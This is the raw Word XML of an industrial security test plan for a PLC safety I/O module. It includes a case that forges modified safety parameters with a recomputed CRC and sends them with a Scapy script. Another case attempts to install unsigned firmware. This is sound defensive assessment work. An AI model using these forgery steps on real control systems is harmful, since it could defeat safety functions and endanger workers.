          <w:p w14:paraId="6F40B1D2" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99"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8151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1431422D" w14:textId="07DE0B35" w:rsidR="008151FA" w:rsidRPr="006D5B99"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8151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0053C263" w14:textId="01C756F2" w:rsidR="008151FA" w:rsidRPr="006D5B99"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8151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD94426" w14:textId="578C8E57" w:rsidR="008151FA" w:rsidRPr="006D5B99"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8151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="567DD932" w14:textId="0C2D7AF4" w:rsidR="008151FA" w:rsidRPr="006D5B99"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Verify (by reference to TC-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>002-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) that a configuration with a mismatched parameter integrity value is rejected, remaining in the safe state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375DFDDC" w14:textId="1507F903" w:rsidR="008151FA" w:rsidRPr="006D5B99"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002-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>; record the result against RQ-005 traceability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008151FA" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226732E6" w14:textId="77777777" w:rsidR="00D541E4"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B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>002-</w:t>
            </w:r>
            <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C91A8D" w14:textId="28A3790A" w:rsidR="008151FA" w:rsidRPr="006D5B99"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PASS on rejection of the mismatched configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2386B2F3" w14:textId="77777777" w:rsidR="008151FA" w:rsidRPr="006D5B99" w:rsidRDefault="008151FA" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14821BE1"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2CE4366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4BAD27B4" w14:textId="2EC5D4C8" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B705A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TC-RQ005-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6443B13A" w14:textId="4570138F" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B705A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TC-RQ002-01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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21AC9FEE" w14:textId="6F359B2B" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00F757C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 TC-RQ002-01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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7FD624FA" w14:textId="07DF9173" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00840E64" w:rsidP="00D65F75">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Execute TC-RQ002-01 procedure; record under RQ-005 traceability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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4574095E" w14:textId="61FE1466" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>As TC-RQ002-01</w:t>
            </w:r>
            <w:r w:rsidR="00F757C0" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> PASS on rejection of the mismatched configuration. Evidence: reuse cm_rq002-01_*. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C87113C" w14:textId="77777777" w:rsidR="00FE6490" w:rsidRPr="006D5B99" w:rsidRDefault="00FE6490" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C88C9C" w14:textId="77777777" w:rsidR="00987C31" w:rsidRPr="006D5B99" w:rsidRDefault="00FE6490" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ005-0</w:t>
      </w:r>
      <w:r w:rsidR="00E83DE4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -  </w:t>
      </w:r>
      <w:r w:rsidR="00987C31" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Valid-Integrity Forgery over Modified Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EDB7CA" w14:textId="77777777" w:rsidR="00987C31" w:rsidRPr="006D5B99" w:rsidRDefault="00987C31" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077AAAC3" w14:textId="7FC72545" w:rsidR="00CA0CC6" w:rsidRPr="006D5B99" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC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7FBD8B2F"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D20F2C7" w14:textId="7E784636" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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3.4 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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47AD90EF" w14:textId="1D0D1F03" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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13D3B215" w14:textId="037E48B0" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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15703" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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0DEBE19F" w14:textId="7CDA8FED" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99"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2C8DDDFE"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Capture/derive a legitimate parameter record and its integrity block.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="598A27A6"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Modify a safety-relevant parameter.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241FE4FF" w14:textId="77777777" w:rsidR="002E08DF"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Recompute the parameter integrity values.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608E2074" w14:textId="76A0CE5E" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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Present the forged configuration; observe whether the device accepts it or raises a configuration error.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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0468976C" w14:textId="168D9C8D" w:rsidR="002E08DF"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Gap-characterization test. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0698105C" w14:textId="1A88927D" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3814C1AA" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00CA0CC6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D392380" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRPr="006D5B99" w:rsidRDefault="00CA0CC6" w:rsidP="00CA0CC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90"/>
        <w:gridCol w:w="7798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA0CC6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEBFFF9" w14:textId="77777777" w:rsidR="00CA0CC6" w:rsidRPr="006D5B99"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0CC6" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CA0CC6" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA70639" w14:textId="24D5FF5A" w:rsidR="00CA0CC6" w:rsidRPr="006D5B99"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FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ005-0</w:t>
            </w:r>
            <w:r w:rsidR="00E83DE4" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90620" w:rsidRPr="006D5B99"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E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68ECBB40" w14:textId="36B3C70E" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E9062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TIA laptop, PLC, SRIO; Kali for observation/logging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90620" w:rsidRPr="006D5B99"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E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439078AE" w14:textId="4FC407C1" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">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TIA Portal, ifm-CRC-Tool; optionally Scapy (if the manipulation should be built from a recreated acyclic-write telegram instead of via TIA).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90620" w:rsidRPr="006D5B99" w14:paraId="65139204" w14:textId="77777777" w:rsidTr="00934222">
        <w:trPr>
          <w:trHeight w:val="1113"/>
        </w:trPr>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E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E6A594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Change a safety-relevant parameter (e.g. Filter F-DI or Symmetry</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40EF83F5"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Discrepancy Time) in TIA Portal (as in TC-RQ004-04, step 1).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA62A5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Do NOT regenerate the iParCRC correctly via the ifm-CRC-Tool. Instead,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B236DF"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recreate the acyclic configuration telegram with Scapy and attach a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23EFF3DD" w14:textId="2B6C2075"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freshly recomputed CRC over the MODIFIED parameter set,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476B198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using the byte layout captured in TC-RQ001-03 and the CRC algorithm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BE8137"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SRIO-2998:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117017E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cat &gt; cm_rq005-02_forge.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14513184"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09E54476"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3B801C7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3CD1B509"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forged_config = bytes.fromhex("REPLACE_WITH_MODIFIED_PARAM_SET_PLUS_VALID_CRC")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541AFB00"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type=0x8892)/Raw(load=forged_config),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1C1BF3"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count=3, inter=0.1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1368F0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3BEAB2CD"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cm_rq005-02_forge.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DA4381" w14:textId="77777777" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E9062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PROFIsafe connection-establishment behaviour in the TIA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6647A1B5" w14:textId="115C8E52" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">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rPr>
              <w:t>#    watch table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90620" w:rsidRPr="006D5B99"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8905C2C" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E90620">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CBE4634" w14:textId="2E15C95D" w:rsidR="00E90620" w:rsidRPr="006D5B99" w:rsidRDefault="00E90620" w:rsidP="00E9062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configuration with a correctly recomputed CRC over modified data is accepted </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms G-1 in RQ-005 (iParCRC is error detection only, not an authenticity check).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="547D6517" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8B8F0E" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72950A67" w14:textId="2B2FCB43" w:rsidR="0047233F" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ005-03 -  </w:t>
      </w:r>
      <w:r w:rsidR="00C75E38" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unsigned / Modified Firmware Installatio</w:t>
      </w:r>
      <w:r w:rsidR="00880820" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0548D7" w14:textId="7A10D3AA" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE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6816599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3A7A6477" w14:textId="3A9D9812" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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3.10 / EDR 3.14 (</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 3.12/3.13) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset D, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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7124412D" w14:textId="127E8046" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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79325040" w14:textId="506E64D8" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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C75E38" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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11D65A2" w14:textId="09B37F8D" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99"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6AD35558" w14:textId="5AB23653"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Place a spare unit into the update state (operational precondition; the mode gate's </w:t>
            </w:r>
            <w:r w:rsidR="00C203C5" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is tested under RQ-011).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487DFED0"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Take a legitimate update package and modify a byte, or strip/forge any signature/header.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24A5567E" w14:textId="77777777" w:rsidR="0059176D"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via the update service and invoke installation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162D0EDC" w14:textId="75F3ECF2" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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device verifies the package before installation (rejects) or proceeds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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5595272" w14:textId="69BA0A44" w:rsidR="0059176D"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modified/unsigned package is rejected by a signature/integrity check before installation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5E0940" w14:textId="77777777" w:rsidR="00F747B8"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package is accepted for installation </w:t>
            </w:r>
            <w:r w:rsidR="00F747B8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 3.10/3.14 unmet. </w:t>
            </w:r>
          </w:p>
